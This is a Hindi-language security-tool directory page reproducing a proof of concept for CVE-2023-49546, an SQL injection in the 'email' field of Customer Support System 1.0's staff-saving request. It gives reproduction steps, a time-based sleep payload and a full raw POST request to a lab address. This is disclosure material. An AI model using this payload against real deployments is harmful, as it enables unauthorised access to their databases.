Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49546 — Customer Support System 1.0 - "save_staff" ऑपरेशन के दौरान "email" पैरामीटर में SQL इंजेक्शन भेद्यता | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49546
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-49546

CVE-2023-49546

Customer Support System 1.0 - "save_staff" ऑपरेशन के दौरान "email" पैरामीटर में SQL इंजेक्शन भेद्यता

रिपॉजिटरी देखें
2 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49546

Customer Support System 1.0 - "save_staff" ऑपरेशन के दौरान "email" पैरामीटर में SQL इंजेक्शन भेद्यता

विवरण: Customer Support System के संस्करण 1 में एक SQL इंजेक्शन भेद्यता मौजूद है। एक दुर्भावनापूर्ण हमलावर कमजोर पैरामीटर 'email' के माध्यम से स्टाफ उपयोगकर्ता बनाते/संपादित करते समय MySQL डेटाबेस में SQL कमांड जारी कर सकता है।

भेद्य उत्पाद संस्करण: Customer Support System 1.0
CVE लेखक: Geraldo Alcântara
दिनांक: 28/11/2023
पुष्टि की गई: 19/12/2023
CVE: CVE-2023-49546
परीक्षण किया गया: Windows

पुनरुत्पादन के चरण:

1- एप्लिकेशन में लॉग इन करें।
2- स्टाफ उपयोगकर्ता जोड़ने के लिए /customer_support/index.php?page=new_staff पृष्ठ पर जाएं या स्टाफ उपयोगकर्ता को संपादित करने के लिए /customer_support/index.php?page=staff_list पर जाएं।
3- स्टाफ उपयोगकर्ता बनाएं या संपादित करें और "email" पैरामीटर में एक दुर्भावनापूर्ण पेलोड डालें।
पेलोड: '+(select*from(select(sleep(2)))a)+'

अनुरोध:

root@kitploit:~
POST /customer_support/ajax.php?action=save_staff HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------323911847618056921711360698406
Content-Length: 1327
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_staff
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l

-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="id"


-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="firstname"

Teste2
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="middlename"

Teste2
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="lastname"

Teste2
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="contact"

Teste2
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="address"

Teste2
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="department_id"

1
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="email"

[email protected]'+(select*from(select(sleep(5)))a)+'
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="password"

teste
-----------------------------323911847618056921711360698406
Content-Disposition: form-data; name="cpass"

teste
-----------------------------323911847618056921711360698406--

खोजकर्ता/श्रेय:
Geraldo Alcântara

टूल डाउनलोड करें